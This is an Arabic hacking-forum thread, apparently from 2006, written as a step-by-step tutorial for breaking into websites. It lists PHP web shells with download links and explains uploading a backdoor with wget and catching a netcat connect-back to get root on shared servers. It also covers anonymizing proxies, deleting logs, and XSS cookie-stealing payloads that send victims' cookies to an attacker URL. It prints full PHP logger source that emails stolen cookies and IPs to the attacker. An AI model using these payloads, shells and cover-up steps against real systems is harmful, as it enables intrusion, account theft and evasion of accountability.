اخر موضوعاتى : تعليم الاختراق الاحترافى . حصريا !!

Xx.Youri.xX · #1 04-07-2006, 05:09 PM

السلام عليكم ....

الموضوع ده موضوع شااااااااااامل فى الهكر ..تقريبا كل الاساسيات اللى انا اعرفها .

بهديها لكم فى اخر يوم ليا هنا فى المنتدى . اشوفكم على خير ..

انا هغير اسمى واميلى وكل حاجه وابدأ بشخصيه جديده .

ومش عايز حد يقول عليا انا هربت ومعلمتكوش حاجه من اللى انا وعد بيها.

الموضوع ده اخد وقت كبير جدا منى . اورجو عدم النقل وحذف حقوق المليكه .

قبل ما ابدأ الموضوع احب اشرح حاجه صغيره قوى .

االاختراق بيتم بطرق كثيره . منها الثغرات المباشره . اللى مشروحه هنا فى المنتدى . ومنها الشيلات . وده موضوع النهارده . ومنها الخدع وانا غير مقتنع بيها فى الحقيقه .

الاختراق عن طريق الثغرات المباشره يعنى مثلا ثغره perl . Xss . Php . sql I. & more الثغرات دى بعضها ممكن يمنحك الباسورد المشفر للادمن مباشره . والبعض الاخر تستخدمه فى الحصول على تصريح زى root , user , nobody , dhttp , http , apache & ........... عن طريق رفع شيل بهذه الثغره ............. وفيه ثغرات مباشره لرفع الشيل ...

لكن النوع الاول من الاختراق لا ينفع إلا فى الاختراق العشاوئى . يعنى بحث على جوجل وتشوف المواقع الل فيها الثغره وبعدين تجرب ولحد ما تلاقى موقع .

والنوع ده من الاختراق انا مش بحبه بس انا بحتقره بصراحه كده . لانه بدون هدف ولا اى شىء يعنى اختراق لمجرد الاختراق .

اما طريقه رفع الشيل فهيا الطريقه الاكثر احتراما وفاعليه فى كل طرق الاختراق .

بندأ الاول نتكلم عن الشيلات . phpShell

الشيل عباره عن كود مكتوب بلغه ال phpshell زى ما هوه واضح .

بتستغل ثغره معينه . ودى انت بدور عليها . وترفع من خلالها الشيل .

شرح الثغرات فى اخر الموضوع ..

Xx.Youri.xX · #2 04-07-2006, 05:09 PM

انواع الشيلات ..

الشيل انواع كثيره . واغلبهم روسى . فيه ضيف جديد اسمه اكتوبر 73 اول شيل عربى لكن ما جربته وبصراحه لا انصحكم به .

بعض الانواع:
1- webadmin هذا الشل جيل ومفيد للمبتدئين لانه يسمحلك برفع الملفات وحذف الملفات وانشاء مجلد بكل سهولة ولتطبيق امر معين مثلا على ملف كل
ما عليك هو انك تضغط على المكان الفارغ امام الملف المراد التعديل عليه واختار الي تبي تعديل حذف او غيره كذلك تستطيع حذف مجلد كامل فهو لا يحتاج الى اوامر لينكس.
http://www.i-saudi.com/lezr.com/webadmin.zip

2- MyShell هذا الشل جميل ولكن قديم وهو يعتمد على اوامر لينكس ويمكنك معرفة صلاحياتك بجانب الجملة Current User ومعرفة كل المجلدات
الذي في المجلد الذي تتصفحه ورابط التحميل للشل http://www.i-saudi.com/lezr.com/MyShell-1.0.6.zip

3- phpRemoteView شل جميل ومشابه لخصائص الشل webadmin وكل مجلد تود التعديل عليه استخدم الاسهم المقابلة لها ولكن هذا الشل فيه ميزة
جميلة وهي انك تقدر تفك تشفير الــ md5 الخاصة بالمنتديات.http://www.i-saudi.com/lezr.com/phpRemoteView.zip

4- phpshell-1.7 شل جميل وشبيه بالشل MyShell مفيد للمبتدئين
http://www.i-saudi.com/lezr.com/phpshell-1.7.zip

5- phpFileManager شل سهل جدا واوامره واضحة ولا يحتاج الى شرح
http://www.i-saudi.com/lezr.com/phpF...ager-0.9.3.zip

6- r57shell الشل الروسي الغني عن التعريف الذي انا افضله من بين كل هذه الشلات وهو يحتاج الى اوامر لينكس ولكن فيه اوامر البحث عن ملفات
الكونفك واوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك الى الموقع المخترق من خلاله

7- phplab شل جميل ولكنه غير عملي ولا انصح المبتدئين به
http://www.i-saudi.com/lezr.com/phplab.zip

8- haexplorer شل ايضا جميل ولكن غير عملي ولا انصح المبتدئين باستخدامه
http://www.i-saudi.com/lezr.com/haexplorer.zip

9- php exploit lab شل ايضا جميل ولكن ايضا لا انصح المبتدئين به
http://www.i-saudi.com/lezr.com/explorer.zip

10- Ch99 شل جميل ورائع وفيه مميزات جميلة وهي انك تقدر تخترق قاعدة البيانات من خلاله عن طريق الاختيار sql وهذا الشل يسمحلك بتطبيق اوامر لينكس
بالاضافة الى امكانية تصفح الملفات من خلاله كما في الشل webadmin ولكن باختيارات اوسع

Xx.Youri.xX · #3 04-07-2006, 05:11 PM

بعد ما عرفتوا انواع الشيلات الان عليكم كيفيه استغلالها .

انا اجيبلكم كتاب الاول يعلمك ازاى تستغل الشيلات . للتحميل . فى المرفقات .

وفى نفس الوقت انا هشرحلك اهم الاشياء اللى لازم تعرفها وانت بتتعامل مع الشيل .

. النقط بالترتيب ..

1 - اوامر الشيل

2- صلاحياتك على الشيل

3- كيفه تصبح روووووت

4- كيفيه التعامل مع السيف مود

اولا . اوامر الشيل .

id: لمعرفة صلاحياتك على السيرفر

CD: يستخدم هذا الامر لاقتحام مجلد اي للدخول الى مجلد معين

pwd: لاستعراض مسارك على السيرفر اي مكان تواجدك على السيرفر

finger: يستخدم لمعرفة المتواجدون على السيرفر

which wget: يستخدم لمعرفة امكانية سحب الملفات للسيرفر وتوجد ثلاث دوال للسحب وهي
wget & curl & lynx واذا اردنا معرفة الدالة curl تعمل نكتب التالي which curl وهكذا للبقية

ls: يستخدم هذا الامر لعرض جميع المجلدات والملفات التي على السيرفر

ls -l: لاستعراض الملفات مع تصاريحها

ls -al: لاستعراض المجلدات مع تصاريحها

uname -a: لمعرفة اصدار اللينكس للسيرفر

unzip: لفك ضغط الملف اذا كان مضغوط ببرنامج winzip

mv: يستخدم هذا الايعاز لتغيير اسماء الملفات او المجلدات واحيانا يستخدم لاخفاء ملف على السيرفر كما يلي
mv worm.php .worm.php ويتم بأضافة نقطة قبل الاسم الجديد

rm: يستخدم هذا الايعاز لمسح المجلدات او الملفات والملفات يكون بالطريقة التالية rm worm.php ولكن تختلف
في حالة المجلدات فاذا اردت مسح المجلد فيكون كالتالي rm -r worm و worm هو المجلد هنا اذا كان يحوي ملفات
ولكن في حالة كونه فارغ يكون كالتالي rmdir worm

mkdir: لتكوين مجلد على السيرفر

chgrp: لتغيير group ممتلكين الملف

chown: لتغيير مالك الملف

clear: لمسح الشاشة

find: يستخدم للبحث عن الملفات ولنفترض ان الملف اسمة worm.php يكون الايعاز find / -name worm.php

cp: يستخدم هذا الايعاز لنسخ المجلدات والملفات وللملفات يكون كالتالي cp worm.php worm1.php
ولكن يختلف في حالة المجلدات فيكون على هذا الشكل cp -r worm worm1

cat: يستخدم هذا الامر لقراءة ملف على السيرفر مثلا cat config.php

du: يستخدم هذا الايعاز لعرض حجم الملفات واذا كان نظام السيرفر OpenDSD فيكون الايعاز هكذا du -f worm.php

df: يستخدم هذا الايعاز لمعرفة حجم الذاكرة الفارغة على السيرفر وايضا على OpenBSD يكون df -k

chmod:يستخدم هذا الايعاز لاعطاء التصاريح للملفات ونأتي الى شرح الايعاز بالتفصيل اكتب ls -l لاستعراض الملفات
مع تصاريحها ولنفترض انه ظهر لك التالي
-rwxr-xr-x 2 worm_hacker worm_hacker 23 Apr 9 07:42 .plan -> /bin/sh
-r-x---r-x 1 worm_hacker worm_hacker 7383 Apr 9 07:45 PERL
-rw------- 6 worm_hacker worm_hacker 2983762 Apr 6 02:32 ****movies
-rw------- 1 worm_hacker worm_hacker 5837 Apr 9 05:34 ****pics
drwx------ 1 worm_hacker worm_hacker 612 Apr 9 01:22 cdrom

لنلقي نظرة على الذي ظهر لنا من كتابة الايعاز اذا ظهر لنا هذه الاشارة - فمعنى ذلك انه ملف واذا لم تظهر وكان بدلها حرف d
فمعنى ذلك انه مجلد directory وناتي الى شرح التصاريح التي ظهرت -rwx------ نلاحظ العلامة - وهذه تعني
انه ملف وليس مجلد والحروف التي بعدها هي التصريح المطلوب rwx والحروف تعني
r= هو قراءة read
w= تصريح الكتابة write
x= تصريح التنفيذ excute
كما تلاحظون worm_hacker الاولى هو المالك لهذه الملفات الذي هو انا هههههههههه اما الثانية فتعني القروب group للملفات
اما هذا 23 Apr 9 07:42 فهو اخر وقت لتعديل الملفات او تحديثها اما الخانة الاخيرة فهي المجلد الذي يحتوي الملف

والان نأتي الى التطبيق العملي للتصاريح:
لاعطاء تصريح الى ملف معين كما ذكرت نستخدم chmod وهناك ثلاث مصطلحات تستخدم لاعطاء الملفات وهي
u= owner
g= group
o= others
فمثلا اعتبر نفسي من القروب فاذا اردت اعطاء تصريح الكتابة للقروب فيكون كالتالي chmod g=rw worm يكون للملف worm
واذا اردنا اضافة تصريح الكتابة وليس اعطاء شوفو الفرق فيكون كالتالي chmod g+w worm ونسيت ان اقولكم شي التصريح
g=rw يضيف تصريح الكتابة والقراءة للملف واليكم امثلة على التصاريح للملفات:
chmod g+rw worm لاضافة تصريح الكتابة والقراءة للقروب group
chmod o+rx worm لاضافة تصريح القراء والتنفيذ للاخرين others
chmod o= worm هنا others لا يستطيعون القراءة والكتابة والتنفيذ
chmod u+rwx worm هنا لاضافة القراءة والكتابة واتلتنفيذ للمالك owner
chmod o-rwx worm هنا لمنع التنفيذ والقراءة وزالكتابة من الاخرين others

والان ناتي للرمز + كما عرفنا هو لاضافة تصريح ونروح للامثلة على طول احسن
4 = read perms لاعطاء تصريح قراءة
2 = write perms لاعطاء تصريح كتابة
1 = execute perms لاعطاء تصريح تنفيذ
0 = no perms لاشي من التصاريح
والان ناتي الى التطبيق العملي
chmod 755 worm والان 4+2+1=7 للمالك owner و 4+1=5 للقروب group والاخرين others
chmod 644 worm والان 4+2=6 هذا للمالك owner و 4 هو للقروب والاخرين others
chmod 700 worm الان 4+2+1=7 لـ owner ولا شي من التصاريح للقروب والاخرين
chmod 722 worm الان 4+2+1= 7 لــ owner ولكن هنا اعطا تصريح الكتابة على الملف لــ group

Xx.Youri.xX · #4 04-07-2006, 05:11 PM

2- صلاحياتك على الشيل .

زىما عرفنا فوق ازاى تعرف صلاحياتك على السيرفر . بالاامر id الان سوف اشرح معنى الصلاحيات .

الصلاحيه root : هيا اعلى صلاحيه حيث هذه الصلاحيه تصبح مبها مدير السيرفر بالكامل . يعنى انت مثلا لو اخترقت موقع بالشيل وشفت صلاحيتك روووت تقدر تخترق اى موقع على نفس السيرفر . . هذه الصلاحيه تتيح لك الحق فى مشاهده وتعديل جميع الملفات . مبروك عليك ..

.. فى نهايه الشهر هشرح الجزء الخاص بكيفيه الحصول على صلاحيه ال Root

الصلاحيه User : وهذه الصلاحيه تعطيك الحق فى التجول فى ملفات الموقع اللى انت مخترقه فقط حيث لا يحق لك الدخول على مجلدات السيرفر

NObody . واخرين . كلهم زى بعض ومعناهم انك تقدر تشاهد كل الملفات فى السيرفر نفس صلاحيه الروووت لكن لا يمكنك التعديل او التغير .

3 - الان كيف تصبح روووووت يعنى السيرفركله يصبح ملكك انت .

ان تكون روووت حاجه مهمه جدا فى الاختراق يعنى مثلا انا عايز اخترق الموقع هنا . ومش عندى ثغرات ليه او انا مستوايا مش قادر يكتشف ثغرات الموقع ده .

ابحث واشوف الموقع ده على سيرفر ايه . .

وابحث عن المواقع اللى على نفس السيرفر واحاول اخترق اى موقع منهم وبعدها اصبح روووت واخترق الموقع هنا .

يعنى مثلا انا اكتشفت ان الموقع هنا على سيرفر هايل جروب .

ابحث عن المواقع اللى على نفس السيرفر . الموقع ده يساعدك فى بحثك . www.netcraft.com

لقيت مثلا انه فيه موقع اسمه موقع الاستاذ على نفس السيرفر . وصاحبه واد اسمه يورى . اقول بلاش منه لان يورى ده بنى ادم متخلف وابعد اعنه احسنلى .

نروح نشوف موقع تانى .

لقيت موقع تانى.

اخترقه واصبح رووووت على السيرفر وتخترق الموقع هنا وتخترقه الاستاذ كمان بالعند فى يورى

طيب ازاى يا عمنا .

اقولك . الاول انت محتاج لباكدور .
ترفعه على الشيل باى امر . wget مثلا ..

وبعدها تسطب برنامج النت كاد netcat بعد التسطيب تدخل على النت كاد . مثلا من قرص السى . وتتصنت على بورد الاتصال اول ما النت كاد يحصل على الاتصال تكتب امر ال id على الشيل وشوف صلاحياتك بقت ايه رووووووت كل ده موجود فى كتاب للتحميل فى اخر الموضوع ..

Xx.Youri.xX · #5 04-07-2006, 05:12 PM

نراجع بسرعه احنا عملنا ايه من الاول .. احنا الاول اخترنا موقع نخترقه لقينه فيه اى ثغره نخترقه منها وبعدها نرفع الشيل . معرفناش نخترق اى موقع تانى على نفس السيرفر ونخترقه ونأخد روووت ونخترق بعدها اى موقع على السيرفر منهم الموقع اللى انت كنت عايز تخترقه فى الاول . .

كده انت كويس فى الاختراق . طيب ايه اللى ينقصك . انا مش هسيبك تقع فى مشكله وتقول يورى مقليش على الحكايه دى ربنا ينتقم منه . ::: :@

فيه حاجتين صغيرين بس .

الاولى . ازاى تفك التشفير بالmd5 طبعا سيبك من برنامج جون المعوق . . فيه شيل ممكن يعمل كده . موجود فوووووووووووووق

الشيل منجحش نعمل ايه ..

ممكن تستعمل ال fake cookies

ودى مشمحتاج شرح برنامج بسيط جدا .

مش عارف استخدمه اعمل ايه .

. بص لو انت هتخترق منتدى ممكن تدخل هنا بس انا منصحكش . http://3asfh.net/vb/showthread.php?t=26702

طيب غيرده . ازاى تخترق الموقع ولا العفاريت تعرف مين اللى اخترقه ..

الطريقه الاولى . تدخل ببروكسى proxy وبعد الدخول ببروكسى تدخل على موقع يقدم خدمه التصفح الخفى .جرب الموقع ده .http://www.proxy7.com/ انصحك بيه .

بكده انت بتستخدم 2 بروكسى ده غير الابى بى تبعك مع العلم ان الشبكات فى مصرزى شبكات العنكبوت مش عارف هيا بدأت منين ورايحه على فين .

يعنى كده مش ممكن يقدر يعرف الاى بى تبعك ابدا .

بس ده ناس بتقول ان يورى مثلا يقدريجيبك . طيب اعمل ايه لما اخترق يورى . مفيش حل تانى ..

فيه وده بقى مستحيل حد يعرف مكانك .. لان من الاخر انت هتحذف الملفات الخاصه بتسجيل الاى بى ورقم البروسيسور .

اسمها ملفات اللوج .

كيفيه حذف ملفات اللوج . ::

فى البدايه انت محتاج برنامج يغير الاى بى تبعك كل ثانيه مثلا فيه برنامج هنا فى الموقع مش فاكر اسمه . ممكن تجربوه برده ,.

او تجربوا البرنامج ده .

stageonas inernet anonym pro

وبرنامج اخر. يعمل حركه حلوه قوى . بيأخد السوكس من السيرفر مباشره وينقله على الموقع يعنى لو اتسجل الاى بى هتلاقى الاى بى اى بى السيرفر الاصلى مباشره . .

البرنامج اسمه socks cap

بعد ده كله مستحيل حد يعرف مكانك .

ولو انت لسه عندك شك .

ممكن بعد ما تأخد روووت تدخل على ملفات اسمها ملفات اللوج وتحذفها وبكده انت فى السليم .

خلاص كل حاجه انت عرفتها خلاص .

لسه بس تعرف ازاى تعرف بعد ما تقرأ الثغره من مواقع السيكيورتى مثل w0rm او موقع www.securityfocus.com

انك تفهم الثغره تستغل ازاى.

Xx.Youri.xX · #6 04-07-2006, 05:17 PM

اولا . الثغرات زى ما قلت انواع كثيره .

اولا نوع الperl

وده اسهل نوع محتاج فى التعامل معاها بنظام الويندوز برنامج ال perl انا واضح لينك التحميل له فى موضوع اختراق منتدى ثانويه فى هذا القسم ..

وشارح كمان طريقه الاستغلال .

هتقولى انا لسه هدور .

الشرح ببساطه .

الاول محتاج برنامج ال activeperl للتحميل من هنا http://downloads.activestate.com/ActivePer...15-MSWin32-x86-

بتعرف ان الثغره من نوع البيرل من اول سطر هتلاقى مكتوب فيه الكلمه دى . #!/usr/bin/perl

وبعدكده انت بتستخدم الاوامر اللى مكتوبه عندك مش هتخترع كتير يعنى .

perl expl.pl

لمعرفه الامر اللى يمكنك استخدامها لاسستغلال الثغره اللى فى الملف expl.pl

. النوع الثانى من الثغرات .. ثغرات ال xss

طيب نأتي الان الى الكود المهم في ثغرات xss

هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات xss
<script>javascript:alert(****************)</Script>

الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash

ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!

طيب الحين وجدت هذا الكود سوف نربطه باللوج

ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )

طيب الان بعد ما ربطته اصبح الرابط :
<script>location.href="http://www.xxxxx.com/log.php?id="+****************</Script>

تمام الان :
www.xxx.com = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
www.xxx.com/log.php برابط اللوج الي عندك

المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :

<script>javascript:alert(****************)</Script>
بـ
<script>location.href="http://www.xxxxx.com/log.php?id="+****************</Script>

الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط

بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط

طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني

بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه

مثلا نربطه بموقع www.google.com بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل وبكذا مايشك

بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :

:
<script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+****************</Script>

طبعا انت استبدل www.google.com باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)

طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال

بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board

الكود للثغره :
http://xxx.com/forums/index.php?act=idx=&#...</script>
احنا راح نستبدل :

<script>javascript:alert(****************)</Script>

بـ

ود PHP:
<script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+****************</Script>

واستبدل هنا موقع جوجل باي موقع تانى انت عايزه

ورابط اللوج www.xxx.com/log.php باللوج تبعك

Xx.Youri.xX · #7 04-07-2006, 05:19 PM

اللوج :

اقتباس:

<?php
// Thnx For Elostaz - http://www.elostaz.com - http://www.s4a.com/forum
//----- E L O S T A Z™* -----//
// Star
//Your Email --::--
$ToGet = "egy_prince27@hotmail.com";
////////////////////////////////
$Ip = $REMOTE_ADDR;
$Sys = $HTTP_USER_AGENT;
//////////////////////////////////////////////
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
//
$Time = date("l dS of F Y h:i:s A");

$Hdr = 'From: Logger <logger@secourty>';

$Msg = '
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For Youri ,, -

---------------------------------------------------------------------
- This Script Coded By Devil-00 [ Devil From Palestine ]* * * * * * -
- Youri notice nothn' <devil-00@hotmail.co.uk><devil.00@gmail.com><devil0f0p@ya hoo.com> -
---------------------------------------------------------------------
- IP* * * ** ::- [ ' .$Ip.'* ]
- System* ** ::- [* '.$Sys.' ]
- The cookie ::- [* '.$id.'* ]
- Time* * ** ::- [ '.$Time.' ]
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd* * * * * * * * * * * * * * * -
- root@devil00 ~ ./s4a*****er passwd --log <log.log> &&* * * * * ** -
---------------------------------------------------------------------
';
$send = mail($ToGet,'S4a - [ Newcookie ]',$Msg,$Hdr);
//
/* ******* code ,, By Devil-00 [* 25/5/2005 ] << v0.10 */*
if(isset($_GET["re"])){
$******* = $_GET["re"];
if($******* == ""){
mail ($ToGet,'S4a - [Error]','******* Is Set And Its Empty !!',$Hdr);
}else{
header("location:".$*******);
}
}
//
?>

Xx.Youri.xX · #8 04-07-2006, 05:23 PM

استبدل هنا :

كود PHP:
$ToGet = "Egy_prince27@hotmail.com";

الايميل: egy_prince27@hotmail.com
باميلك .

واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير الايميل واحفظه بامتداد php
وارفعه على موقعك او على موقع لايكوس

تمام كده .

لسه ثغرات ال php ممكن تدخل هنا http://3asfh.net/vb/showthread.php?t=42273 ما عندى وقت اشرح بالصور الان خالص واللهى.

دلوقت خلصنا شرح كل اساسيات الاختراق .

وباقى تحميل هذا الملف قد يفيدكم ..

http://www.allpurposehomepage.com/up...orm_Hacker.exe

اما البرامج فانا مقدرتش اضعها فى لينكات لانى مش مش هدخل تانى ومش هقدر اغير اللينكات عند حدوث عطل .

انا كاتب كل اسماء البرامج انصح باستخدام هذه المواقع للبحث عن البرامج

www.moon15.com

www.download.com

www.phazeddl.com

..................................... تحياتى ...

اسف طولت عليكم .

. جميع الحقوق محفوظه للكاتب : Xx_Youri_xX™

....:::: www.ELOSTAZ.com ::::....

بعض الاجزاء منقوله عن مواضيع للكاتب الاصلى W0rm_hacker....
عن منتدايات العاصفه .

وجميع حقوقه محفوظه فى النقل .

تحياتى ... Y O U R I